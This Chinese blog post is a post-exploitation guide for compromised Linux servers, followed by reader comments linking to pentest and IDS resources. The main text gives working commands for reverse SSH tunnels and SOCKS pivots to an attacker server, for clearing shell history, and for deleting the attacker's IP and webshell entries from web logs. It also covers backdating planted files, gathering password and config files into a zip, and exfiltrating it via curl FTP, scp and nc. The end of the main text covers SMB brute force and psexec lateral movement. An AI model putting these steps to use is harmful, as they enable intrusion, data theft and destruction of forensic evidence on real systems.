各个网站中的搜集+自己的修改=>文章
一些反弹工具/脚本:
nc、phpsocks5、s5.py、back.py、Perl版的socket代理……(总之基本上各个语言的都可以有,就看你能否找到适合的,在Linux系统上和bash相关的较多)
ssh的几种姿势
ssh有几个比较重要的参数:
-f: 连接成功后切换到后台,不会占用当前的shell,shell断了也会继续执行,相当于 nohup 和 & 。
-N: 连接后不调用shell,用处后面讲。
-R:把本地网络(可以是本机或者任何内网甚至外网端口)端口反弹到ssh服务器
用法:
首先你要有个外网ip的ssh服务器,如果目标内网限制了访问端口,可以开到常见端口比如80或者443上面,可以直接改设置或者iptables映射一下。你需要有这个服务器的root权限。在sshd_config里面打开端口转发, AllowTcpForwarding yes 还有 Gateway Ports,如果之前没开的话改完需要重启一下sshd。
另外就是因为反弹端口需要让目标机器登录到你的ssh服务器,为了安全起见需要建立一个专门用来端口转发的用户,useradd随便建个用户,设置密码然后到/etc/passwd里面,把最后一个’:’后面的shell位置改成/sbin/nologin或者/bin/false,这样即使对方记录了你的ssh密码也没法对你转发的服务器做什么(比如取证之类)
-N的作用:
因为转发用的用户没有shell,如果没有-N的话会因为得不到shell而自动断开连接,-N可以避免这一点。
开始转发:
ssh -fNR 要反弹到的端口:目标本机或者内外ip:要反弹的目标端口 转发专用用户名@你的ssh服务器ip 执行后会问你转发用户名的密码,输入成功后会自动切换到后台
例子1:
本地转发: 目标机器上有个oracle端口在1521,但是只能从内网访问。提权提不上,没装sqlplus等工具,webshell数据库管理各种出错,不过翻到了登录用户名和密码。不过我自己的机器上装了个navicat for oracle?? ssh服务器上的端口转发用户名叫forward,服务器ip是123.123.123.123
ssh -fNR 11521:127.0.0.1:1521 [email protected]
注意:之所以开到11521端口是因为<1024的端口需要root权限才能占用,另外注意你反弹到服务器的端口不能被iptables之类的挡住,不然你没法从外网访问(废话么)
反弹成功后,打开navicat,新建个连接,ip输入123.123.123.123,端口输入11521,然后用户名和密码,啪啪啪??连上了
例子2:
内网ip转发: 除了能转发localhost,还能转发内网其他ip的端口,甚至在不同网段都行,只要能从内网的已沦陷机器访问到就行。比如内网有个windows服务器,ip 192.168.5.10, 开了3389端口,不过也只能在内网访问??
ssh -fNR 13389:192.168.5.10:3389 [email protected]
反弹成功后mstsc连123.123.123.123:13389即可??
ssh转发端口是可以多开的,就是要注意转发到你服务器的端口不要重了。
用完之后记得关掉:
ps aux|grep ssh
在进程里可以看到ssh的转发命令,把pid kill了就行。另外也可以在ssh服务器端kill,
netstat -anp|grep sshd
ssh的时候会记录known_hosts,所以最后擦屁股的时候记得到开ssh的用户名的home文件夹 .ssh里面把known_hosts清掉
ssh反弹socks5方法
如果用ssh自带的socks5服务器的话,需要一个能在本地登录的帐号,可以是nologin的,但是必须要能登录,如果不是root的话,socks端口只能开到>1024的端口。原理是先在本地开socks5,然后把本地socks5服务器的端口弹到远程服务器。
姿势:
ssh -fND 127.0.0.1:8080 [email protected]
这样会在本地8080端口开socks5代理,然后反弹
ssh -fNR 18080:127.0.0.1:8080 [email protected]
这样可以把socks5代理弹到123.123.123.123的18080端口,可以用proxychains和其他支持socks5代理的工具最大限度的窥探内网
Linux下隐藏痕迹
通过其他方式得到shell的话,需要去掉histfile等环境变量:
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null;
登录ssh后管理员用w查看当前登录用户,所以有必要隐藏;
去掉文件中匹配pattern的行:
awk ‘!/pattern/’ filename > temp && mv temp filename
这个原理说白了就是去掉原文件里的指定内容然后生成新文件,再用新的覆盖旧的,弄完记得用chmod还原原来的属性。例子:
awk ‘!/123.123.123.123/’ /var/log/httpd/access_log > temp && mv temp /var/log/httpd/access_log
去掉所有包含123.123.123.123的日志记录。
也可以同时匹配多个关键词:
awk ‘!/123.123.123.123|111.111.111.111|phpspy.php/’ /var/log/httpd/access_log > temp && mv temp /var/log/httpd/access_log
修改文件访问|创建|修改时间:
touch -amt 200901231532 文件名
改成2009年1月23号15点32分
批量修改时间:
比如你在一个文件夹改了很多php插了一堆一句话:
ls|xargs touch -amt 200901231532
把当前目录所有文件时间都改了。
信息搜集
#!/bin/bash # Linux shell script for information gathering # 找出所有.sh .pl .py .conf .cnf .ini .*history .*pass* (/usr/share目录里面的除外) # 并且在当前目录zip打包。有些时候很多配置文件的权限配置不严,如果搜集完全的话对于进行下一步有很大帮助。 # Find all .sh .pl .py .conf .cnf .ini .*history .*pass* under "/"(Except in /usr/share) then zip in current directory find / ! -path "/usr/share/*" -regex ".*.sh$|.*.pl$|.*.py$|.*.conf$|.*.cnf$|.*.ini$|.*/..*history$|.*/..*pass.*" -print | zip pack.zip -@ # Linux command --> zip # Option: -@ --> Take the list of input files from standard input. Only one filename per line.从标准输入中读取名称,一个路径名称用一行
打包各种脚本和配置文件还有history日志。有的环境下zip需要一些参数才能用,请自行修改。
在/var/www搜集全部 conf.php然后打包:
find /var/www -name ‘*conf*.php’ -print | zip config.zip -@
找包含特定内容的文件并且那一行显示出来:
grep -RPa –include=*.php ‘($PATTERNS)’ $SEARCH_DIR
比如在web目录找包含password这个词的所有php
grep -RPa –include=*.php ‘password’ /var/www
pattern可以用正则,可以不指定文件类型(会很慢!)
文件传送
找到需要的东西后,怎么往外发也是个问题,一般大文件用ftp,scp,小文件用nc。
ftp方法:
如果目标装了curl的话就很简单了
curl -v -T 文件名 ftp://username:password@ftpip
scp方法:
适合有ids之类东西的地方,可以把sshd开到443等传统加密流量的接口,scp帐号需要有写入和执行shell的权限
scp backup.tgz [email protected]:/tmp/backup.tgz
nc方法:
先在服务端监听
nc -l port > 文件名
然后到要发送文件的服务器
nc 服务端ip 端口 < 文件名
发送小文件还行,大文件有时候会断。
从Linux到Windows
有些时候你拿了linux服务器的shell,想跨到windows的机器上,基本就是通过两个手段,一个是针对windows的服务进行exploit溢出,还有就是利用在linux上搜集的用户名和密码然后通过psexec放shell。
首先要确定windows主机的位置和打开的服务,在内网扫开445和3389的机器,基本是windows了,扫的时候要注意,不管用什么工具,尽量用socket connect的方式扫。像SYN 方式扫描如果内网有ids之类肯定会被发现,connect方式扫描相对来说和正常连接差不多。 扫到windows机器列表后,准备好刚才在linux下收集的各种用户名和密码,还有一些常见的弱密码,生成密码字典和用户名字典,字典里再加上一些windows本身的用户名,比如administrator。 尝试密码的话直接在linux下用hydra,破解smb密码,运气好的话,只要扫出一个,就能用psexec getshell了。运气不好就剩下溢出这一条路了。如果溢出都不行,windows主机和linux在同一个网段的话,还可以试试通过arp spoof抓smb认证包,然后把hash弄出来破解或者注入hash,但是动静会比较大,不到最后不建议使用。
psexec
有几种选择,metasploit里面auxiliary里面的psexec模块,可以直接放个msf的reverse paylaod上去。另外可以把windows的服务器的445端口反弹出来,再找个windows的机器用psexec。还有就是直接在内网的linux机器上用python的psexec,https://code.google.com/p/impacket/
《 “各种环境下的渗透测试” 》 有 27 条评论
IDS现在用的比较多的有(Snort/Suricata/Bro/Sagan/Gnort),不同于单线程的 Snort ,Suricata 可以很容易的从多核硬件的多进程特性所带来的好处中获益。
https://github.com/Snorby/snorby/wiki/Snort-vs-Suricata-vs-Sagan
Barnyard2是用来读取Snort的二进制文件,并将其存储在MySQL数据库中的。
Snorby是一个Ruby on Rails的Web应用程序,是网络安全监控与目前流行的入侵检测系统(Snort、Suricata和Sagan)的接口。该项目的目标是创建一个免费的,开源和竞争力的网络监控应用,为私人和企业使用。
搭建基于Suricata+Barnyard2+Base的IDS前端Snorby
http://blog.csdn.net/qq_29277155/article/details/53205582
http://wps2015.org/drops/drops/%E6%90%AD%E5%BB%BA%E5%9F%BA%E4%BA%8ESuricata+Barnyard2+Base%E7%9A%84IDS%E5%89%8D%E7%AB%AFSnorby.html
Suricata开放的攻击检测规则集(AttackDetection: Suricata PT Open Ruleset)
https://github.com/ptresearch/AttackDetection
金融企业安全建设探索之异常访问检测系统
https://mp.weixin.qq.com/s?__biz=MzI2MjQ1NTA4MA==&mid=2247483719&idx=1&sn=00cb5fccde1e028872b0c4b7d5022928
复杂和变态的环境下jsp连接数据库
http://www.legendsec.org/1774.html
内网渗透主机发现的技巧
https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247484689&idx=1&sn=67433d76467ed12fcd86981a1b2e32c2
内网主机发现技巧补充
https://mp.weixin.qq.com/s/l-Avt72ajCIo5GdMEwVx7A
电子取证技术基础与实践
http://gitbook.cn/books/598a5e46436c767dc4dd0748/index.html
常用的转发技术
http://rcoil.me/2017/06/%E5%B8%B8%E7%94%A8%E7%9A%84%E8%BD%AC%E5%8F%91%E6%8A%80%E6%9C%AF/
`
适用端口转发的网络环境有以下几种:
服务器处于内网,可以访问外部网络。
服务器处于外网,可以访问外部网络,但是服务器安装了防火墙来拒绝敏感端口的连接。
服务器处于内网,对外只开放了80端口,并且服务器不能访问外网网络。
对于以上三种情况,传统的方法可以突破1和2二种(全都可以理解为lcx),第3种可以使用SOCKS代理。
1. 目标是具有公共IP的
2. NAT情景(穿透)
3. 内网转发
4. 使用SOCKS代理
`
一份针对安全人员的渗透测试工具列表
https://techincidents.com/complete-penetration-testing-tool/
推荐一款很好用的内网穿透工具–FRP
http://www.hi-linux.com/posts/25686.html
`
FRP 作用
FRP 架构
FRP 安装
FRP 配置
FRP 使用实例
FRP 高级进阶
FRP 管理
参考文档
`
渗透测试中的持久化控制策略与技巧基础
https://rastamouse.me/2018/03/a-view-of-persistence/
如何在 Windows 上部署 Suricata IDS/IPS
https://blog.didierstevens.com/2018/03/27/quickpost-using-suricata-on-windows/
【渗透测试】渗透测试最强秘籍(Part 1:信息收集)
http://blog.nsfocus.net/penetration-test-1/
【渗透测试】渗透测试最强秘籍(Part 2:配置和部署)
http://blog.nsfocus.net/http-blog-nsfocus-net-penetration-test-2/
https://serverfault.com/questions/682842/windows-domain-controller-authentication-logon-logging-and-forensics
http://techgenix.com/logon-types/
`
Logon Type 2 – Interactive
This is what occurs to you first when you think of logons, that is, a logon at the console of a computer. You’ll see type 2 logons when a user attempts to log on at the local keyboard and screen whether with a domain account or a local account from the computer’s local SAM. To tell the difference between an attempt to logon with a local or domain account look for the domain or computer name preceding the user name in the event’s description. Don’t forget that logon’s through an KVM over IP component or a server’s proprietary “lights-out” remote KVM feature are still interactive logons from the standpoint of Windows and will be logged as such.
Logon Type 3 – Network
Windows logs logon type 3 in most cases when you access a computer from elsewhere on the network. One of the most common sources of logon events with logon type 3 is connections to shared folders or printers. But other over-the-network logons are classed as logon type 3 as well such as most logons to IIS. (The exception is basic authentication which is explained in Logon Type 8 below.)
Logon Type 4 – Batch
When Windows executes a scheduled task, the Scheduled Task service first creates a new logon session for the task so that it can run under the authority of the user account specified when the task was created. When this logon attempt occurs, Windows logs it as logon type 4. Other job scheduling systems, depending on their design, may also generate logon events with logon type 4 when starting jobs. Logon type 4 events are usually just innocent scheduled tasks startups but a malicious user could try to subvert security by trying to guess the password of an account through scheduled tasks. Such attempts would generate a logon failure event where logon type is 4. But logon failures associated with scheduled tasks can also result from an administrator entering the wrong password for the account at the time of task creation or from the password of an account being changed without modifying the scheduled task to use the new password.
Logon Type 5 – Service
Similar to Scheduled Tasks, each service is configured to run as a specified user account. When a service starts, Windows first creates a logon session for the specified user account which results in a Logon/Logoff event with logon type 5. Failed logon events with logon type 5 usually indicate the password of an account has been changed without updating the service but there’s always the possibility of malicious users at work too. However this is less likely because creating a new service or editing an existing service by default requires membership in Administrators or Server Operators and such a user, if malicious, will likely already have enough authority to perpetrate his desired goal.
Logon Type 7 – Unlock
Hopefully the workstations on your network automatically start a password protected screen saver when a user leaves their computer so that unattended workstations are protected from malicious use. When a user returns to their workstation and unlocks the console, Windows treats this as a logon and logs the appropriate Logon/Logoff event but in this case the logon type will be 7 – identifying the event as a workstation unlock attempt. Failed logons with logon type 7 indicate either a user entering the wrong password or a malicious user trying to unlock the computer by guessing the password.
Logon Type 8 – Network Clear text
This logon type indicates a network logon like logon type 3 but where the password was sent over the network in the clear text. Windows server doesn’t allow connection to shared file or printers with clear text authentication. The only situation I’m aware of are logons from within an ASP script using the ADVAPI or when a user logs on to IIS using IIS’s basic authentication mode. In both cases the logon process in the event’s description will list advapi. Basic authentication is only dangerous if it isn’t wrapped inside an SSL session (i.e. https). As far as logons generated by an ASP, script remember that embedding passwords in source code is a bad practice for maintenance purposes as well as the risk that someone malicious will view the source code and thereby gain the password.
Logon Type 9 – New Credentials
If you use the RunAs command to start a program under a different user account and specify the /netonly switch, Windows records a logon/logoff event with logon type 9. When you start a program with RunAs using /netonly, the program executes on your local computer as the user you are currently logged on as but for any connections to other computers on the network, Windows connects you to those computers using the account specified on the RunAs command. Without /netonly Windows runs the program on the local computer and on the network as the specified user and records the logon event with logon type 2.
Logon Type 10 – Remote Interactive
When you access a computer through Terminal Services, Remote Desktop or Remote Assistance windows logs the logon attempt with logon type 10 which makes it easy to distinguish true console logons from a remote desktop session. Note however that prior to XP, Windows 2000 doesn’t use logon type 10 and terminal services logons are reported as logon type 2.
Logon Type 11 – Cached Interactive
Windows supports a feature called Cached Logons which facilitate mobile users. When you are not connected to the your organization’s network and attempt to logon to your laptop with a domain account there’s no domain controller available to the laptop with which to verify your identity. To solve this problem, Windows caches a hash of the credentials of the last 10 interactive domain logons. Later when no domain controller is available, Windows uses these hashes to verify your identity when you attempt to logon with a domain account.
`
通过PF_RING FT来给Suricata, Bro, Snort进行提速 (How to accelerate Suricata, Bro, Snort with PF_RING FT)
https://www.ntop.org/pf_ring/how-to-accelerate-suricata-bro-snort-with-pf_ring-ft/
渗透测试工具备忘录
https://xz.aliyun.com/t/2482
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/
`
简介
更新日志
开始前
网络配置
设置IP 地址
子网划分
公开来源情报
被动信息收集
DNS
DNS 域传送
邮件
Simply Email
半主动信息收集
基本指纹识别
使用NC抓取banner
主动信息收集
DNS 爆破
端口扫描
枚举和攻击网络服务
SAMB / SMB / Windows 域枚举
Samba枚举
LLMNR / NBT-NS欺骗
SNMP枚举工具
远程服务枚举
使用finger枚举
rwho
TLS&SSL 测试
testssl.sh
漏洞评估
数据库渗透测试
Oracle
Oracle TNS版本指纹识别
爆破Oracle账户
Oracle权限提升
MSSQL
爆破 MSSQL登陆
Metasploit MSSQL Shell
网络
Plink.exe 隧道
跳板(Pivoting)
SSH 跳板(ssh Pivoting)
Meterpreter Pivoting
TTL 指纹识别
IPv4 速查
各类IP的地址范围
IPv4私有地址
IPv4子网速查表
VLAN hopping(跳跃攻击)
VPN测试工具
IKEForce
IKE 激进模式 PSK 破解
PPTP Hacking
DNS 隧道
攻击机器:
BOF / Exploit
Exploit 搜索
搜索EXP
在Kali上编译WIndows的exp
交叉编译Exploits
利用通用漏洞
利用Shellshock漏洞
简单的本地Web服务器
挂载文件共享
HTTP / HTTPS Web服务枚举
数据包侦测
用户名枚举
SMB 用户枚举
SNMP 用户枚举
密码
字典
爆破服务
使用Hydra 爆破FTP
使用Hydra 爆破POP3
使用Hydra 爆破SMTP
密码破解
John The Ripper – JTR
Windows 渗透测试命令
Linux 渗透测试命令
编译EXP
判断C代码适用于Windows平台还是Linux
使用GCC编译Exploit
在64位的Kali上用GCC编译32位的EXP
在 Linux上编译可运行于Windows的exe文件
SUID 二进制
运行 /bin/bash的SUID C Shell
运行 /bin/sh的SUID C Shell
构建 SUID Shell 二进制
反向Shells
TTY Shells
用Python模拟 TTY Shell的技巧
用sh模拟交互式shell
用Perl模拟 TTY Shell
用Ruby模拟 TTY Shell
用Lua 模拟TTY Shell
从Vi模拟TTY Shell
用NMAP模拟TTY Shell
Metasploit 速查表
Meterpreter Payloads
Windows 反向meterpreter payload
Windows VNC Meterpreter payload
Linux 反向Meterpreter payload
Meterpreter速查表
常用Metasploit 模块
远程Windows Metasploit 模块(exploits)
本地Windows Metasploit 模块(exploits)
辅助Metasploit 模块
Metasploit Powershell 模块
Windows 后渗透Metasploit 模块
ASCII表速查
CISCO IOS(网际操作系统) 命令
密码学
哈希长度
哈希例子
SQLMap例子
`
渗透,持续渗透,后渗透的本质
https://mp.weixin.qq.com/s/drkyLz2QdU2py4YuIMm3gg
`
目标资产信息搜集的广度,决定渗透过程的复杂程度。
目标主机信息搜集的深度,决定后渗透权限持续把控。
渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。
持续渗透的本质是线索关联,而线索关联为后续的攻击链方提供了强大的方向。
后渗透的本质是权限把控,而权限把控为后渗透提供了以牺牲时间换取空间强大基础。
`
DarthSidious – AD域环境渗透测试实验室
https://github.com/chryzsh/DarthSidious
Living Off the Land – Windows 渗透测试技巧分享
https://liberty-shell.com/sec/2018/10/20/living-off-the-land/
How To Threat Hunt For PsExec, Other Lateral Movement Tools(如何捕获PsExec等横向移动工具的痕迹)
https://www.redcanary.com/blog/threat-hunting-psexec-lateral-movement/
Active Directory 的核心安全原则及最佳实践
https://ernw.de/download/AD_Summit_2018/01_AD_Summit_CoreSecPrinciples_fk_hw_v.1.2_signed.pdf
Microsoft 域环境安全审计方法介绍
https://www.exploit-db.com/docs/english/46019-an-internal-pentest-audit-against-active-directory.pdf
针对 Windows 事件跟踪日志篡改的攻防研究
https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63
最快的方式搭建域环境
https://payloads.online/archivers/2019-04-13/1
全程带阻:记一次授权网络攻防演练(上)
https://www.freebuf.com/vuls/211842.html
`
完整攻击链大概包括信息搜集、漏洞利用、建立据点、权限提升、权限维持、横向移动、痕迹清除等七步,虽然这个站点只经历了前四步,但也具有较强的代表性,组合利用漏洞形成攻击链,拿下管理权限。
故事尾声
到此,任务算完成了,整个过程很有意思,目标环境设有层层防御,但每道防线或多或少存在些小问题,多个小问题串起来,便成了黑客进入系统内部的攻击路径。
完整来说,全流程的攻击链包括信息搜集、漏洞利用、建立据点、权限提升、权限维持、横向移动、痕迹清除等七步,虽然这个站点只经历了前四步,但也具有较强的代表性。简单回顾下,大概经过以下关键步骤:
1. 密码找回功能处,图片验证码未刷新,导致可枚举用户名,得到三个有效账号:nana、admin、liufei;
2. 密码找回功能,若是有效用户,服务端泄漏有效用户的敏感信息,包括哈希密码;
3. 由于系统存在弱口令,导致通过彩虹表反解出 liufei 的密码;
4. 通过 liufei 账号登录系统,发现为低权账号,无可利用功能;
5. 回到 nana 账号上,通过制作社工密码,暴破出该账号密码;
6. 登录 nana 账号,找到上传点,但非 admin 而禁止上传;
7. 回到 admin 账号上,重新审查密码找回功能,发现存在 IDOR,可重置 admin 密码,但业务厂商告知不能重置,作罢;
8. 再次登录 nana 账号,分析上传请求报文,发现服务端通过 JWT 作为身份凭证,由于 JWT 采用弱密钥,导致垂直越权至 admin;
9. 以 admin 身份上传,服务端通过文件类型签名作为上传限制,可轻松绕过,成功上传 webshell;
10. 服务端审查 webshell 流量,无法长时间使用,改用冰蝎马,实现 POST 数据二进制化、加密化,突破 webshell 流量审查;
11. 反弹 shell 时遇阻,目标设置向外访问端口白名单,通过各种手法找到端口白名单包含 80、443;
12. 设置反弹 shell 至 443 端口仍失败,发现目标部署反弹流量审查设备,于是,用 openssl 加密反弹流量,成功获取反弹 shell;
13. 为方便后续提权、维权、移动,通过技巧将反弹的哑 shell 转为全功能的交互式 shell;
14. 通过查找目标内核版本,发现存在脏牛漏洞,上传 exp 后顺利提权为 root。
# 一些亮点评论
自从乌云离开后再也没看到过这种经典的技术文章,作者的技术底子扎实,思路清晰,对技术的无私奉献精神值得学习。谢谢
1、思路清晰,每一步要干啥都知道。
2、知识面广,有一句话说得好:“知识面决定攻击面,知识链决定攻击深度”
3、整片文章看起来很舒服,肯定是个写报告的高手。
`
全程带阻:记一次授权网络攻防演练(下)
https://www.freebuf.com/vuls/211847.html
域安全浅析-基础概念及历史漏洞分析
https://mp.weixin.qq.com/s/R1J6UFKw_m8PVuI_pcUMkA
`
Active Directory 101
基础概念
Active Directory
DNS & LDAP & Kerberos
Kerberos Overview
TGT & TGS
Kerberos & PAC
Kerberos & SPN
Kerberos Delegation
历史漏洞
GPP (MS14-025)
GoldenPAC (MS14-068)
PrivExchange (SSRF & NTLM Relay)
NTLM Tampering (Drop The MIC) & RBCD
Mitm6 & NTLM Relay & Kerberos Delegation
`
MMD研究员对于Linux后渗透的蓝队视角
https://2019.hack.lu/archive/2019/Fileless-Malware-Infection-and-Linux-Process-Injection-in-Linux-OS.pdf
物理渗透装备篇之进
https://mp.weixin.qq.com/s/T7vX9ddbkMkP86H7LHLAiQ
`
物理渗透中有顺手装备的支撑,会减少我们暴露的风险,达到事半功倍。知识有限,本文只列了一些我熟悉的装备,可能不太全,欢迎大家补充。我大致将装备分为两类:进和攻,进可以理解为进入,不管你是用无人机、乔装打扮、hackrf等装备,都是为了进入目标;攻即为攻击,badusb、键盘记录、c2等,是为了开始攻击而需要的一些装备。一篇写完可能太长,会采用连载。
介绍进-攻装备前不得不介绍下物理必带装备->无线微型随身记录仪
推荐理由:
1.虽然物理渗透是授权的,但是为了防止意外和扯皮(东西丢失之类)的事件,无线微型随身记录仪也是保护我们自己的一种装备;
2.被抓时可以通过视频记录及时向保安大哥解释清楚,避免被防暴叉按在地上;
3.身处目标环境时难免紧张错过一些重要的东西,此时队友可通过无线随身记录仪远程实时观看视频跟你协同作战;
`
内网渗透横行移动
https://misakikata.github.io/2020/08/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%A8%AA%E8%A1%8C%E7%A7%BB%E5%8A%A8/
`
在进行这些东西之前,至少需要一个可完整交互的shell,默认就已经获得了shell,并且提权到nt authority\system
AS-REP Roasting
Kerberoast
Bruteforcing
PTK
PTH
PTT
– ms14-068
– 黄金票据
– 白银票据
– skeleton key
Relay Hash
– Inveigh
– smbrelayx
– Responder
– msfrelay
`
ET Pro Ruleset – A timely and accurate rule set for detecting and blocking advanced threats using your existing network security appliances.
https://www.proofpoint.com/us/threat-insight/et-pro-ruleset
`
Proofpoint ET Pro is a timely and accurate rule set for detecting and blocking advanced threats using your existing network security appliances, such as next generation firewalls (NGFW) and network intrusion detection/prevention systems (IDS/IPS). Updated daily and available in Suricata and Snort formats, ET Pro covers more than 40 different categories of malware command and control, credential phishing, DDoS, botnets, network anomalies, exploits, vulnerabilities, SCADA exploit kit activity, and much more.
Proofpoint ET Pro是一个及时和准确的规则集,用于检测和阻止高级威胁,使用您现有的网络安全设备,如下一代防火墙(NGFW)和网络入侵检测/防御系统(IDS/IPS)。每天更新,可在Suricata和Snort格式,ET Pro涵盖40多个不同类别的恶意软件命令和控制,凭据网络钓鱼,DDoS,僵尸网络,网络异常,利用,漏洞,SCADA利用工具包活动,以及更多。
Today, advanced cyber-attack campaigns are perpetrated by a variety of attackers with motives ranging from profit to espionage. Given the dynamic nature of these threats, it has become nearly impossible for enterprises to keep pace with the changing threat landscape. That’s where Proofpoint comes in.
如今,先进的网络攻击活动是由各种各样的攻击者实施的,动机从利润到间谍活动不等。鉴于这些威胁的动态性质,企业几乎不可能跟上不断变化的威胁格局。这就是Proofpoint发挥作用的地方。
Proofpoint公司付费Snort规则ET Pro,跟随官方版本进行更新。
`
Snort及Suricata企业版付费规则
https://www.cnsrc.org.cn/rules/86.html
「Suricata规则集」ET Pro Ruleset购买
https://blog.csdn.net/weixin_41468462/article/details/114897982
流量安全分析(七):如何分析一个攻击数据报文?
https://www.sec-un.org/traffic-safety-analysis-vii-how-to-analyze-an-attack-of-packets/